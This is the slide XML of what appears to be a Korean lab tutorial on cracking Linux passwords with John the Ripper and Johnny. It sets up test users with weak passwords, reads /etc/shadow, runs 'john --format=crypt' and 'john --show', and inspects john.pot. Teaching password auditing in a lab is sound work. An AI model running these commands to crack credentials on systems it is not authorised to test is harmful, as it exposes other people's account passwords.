        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Test1, test2, …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유저에 패스워드를 할당한다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  <a:p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각 유저의 패스워드는 다음과 같다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  <a:p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Test1 : test</a:t>
            </a:r>
          </a:p>
          <a:p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Test2 : test!@#</a:t>
            </a:r>
          </a:p>
          <a:p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Test3 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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votmdnjem</a:t>
            </a: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Test4 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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votmdnjem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!@#</a:t>
            </a:r>
          </a:p>
          <a:p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ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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6699EF13-F2F9-405C-91DD-E36B9912D0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380" y="1797642"/>
            <a:ext cx="5913238" cy="5071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341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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/shadow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명령어로 각 유저의 패스워드가 암호화되어 보관되어 있는 것을 확인한다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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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9EE0C7B9-2E4A-4FFD-8A62-C0F68893A4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213" y="3221162"/>
            <a:ext cx="6222997" cy="1522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3829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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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05 – Password Attacks – John</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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칼리에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기본적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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내장되어있는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CLI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환경의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John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을 확인할 수 있다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  <a:p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(GUI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환경은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Johnny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라는 파일을 따로 다운받아야 한다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.)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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42F6FF30-6D93-40C2-AF1A-15C33239F1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691" y="1715152"/>
            <a:ext cx="6050309" cy="5054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6316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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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John --format=crypt /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/shadow</a:t>
            </a:r>
          </a:p>
          <a:p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명령어로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shadow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파일을 직접 열거나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혹은 소유하고 있는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shadow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파일이 있다면 그 파일을 지정해주면 된다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  <a:p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해당 명령어를 실행하면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shadow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파일에 암호화되어 있는 패스워드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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복호화해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유저명과 함께 출력해준다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특히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root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계정은 빨간 색으로 표시된다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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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F10D0D51-248B-46B8-B72A-8DD5F3BDEA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937" y="2099866"/>
            <a:ext cx="4899526" cy="4680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4156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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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john--show /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/shadow</a:t>
            </a:r>
          </a:p>
          <a:p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명령어를 이용해 확인하면 패스워드가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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복호화된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상태로 보인다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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BE5780E9-4554-4BCC-A1C7-8A853BD73A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87" y="2941900"/>
            <a:ext cx="6297266" cy="3260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9031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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Cat /root/.john/john.pot</a:t>
            </a:r>
          </a:p>
          <a:p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명령어를 이용해 암호화에 사용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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해쉬를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확인할 수 있다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한 번 사용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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해쉬는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저장되어 다음에 사용된다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  <a:p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해당 파일에 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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해쉬가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존재하면</a:t>
            </a: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John --format=crypt /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/shadow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명령어로 해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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해쉬에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대한 정보는 출력되지 않는다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  <a:p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(user1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에 대해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format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명령어를 사용했으면 비밀번호를 바꾸거나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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해쉬를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지우기 전까지는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format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명령어로 다시 출력되지 않는다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.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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20606716-8B3A-4395-A50F-7544997A58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171" y="4312795"/>
            <a:ext cx="6222997" cy="1191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5748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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
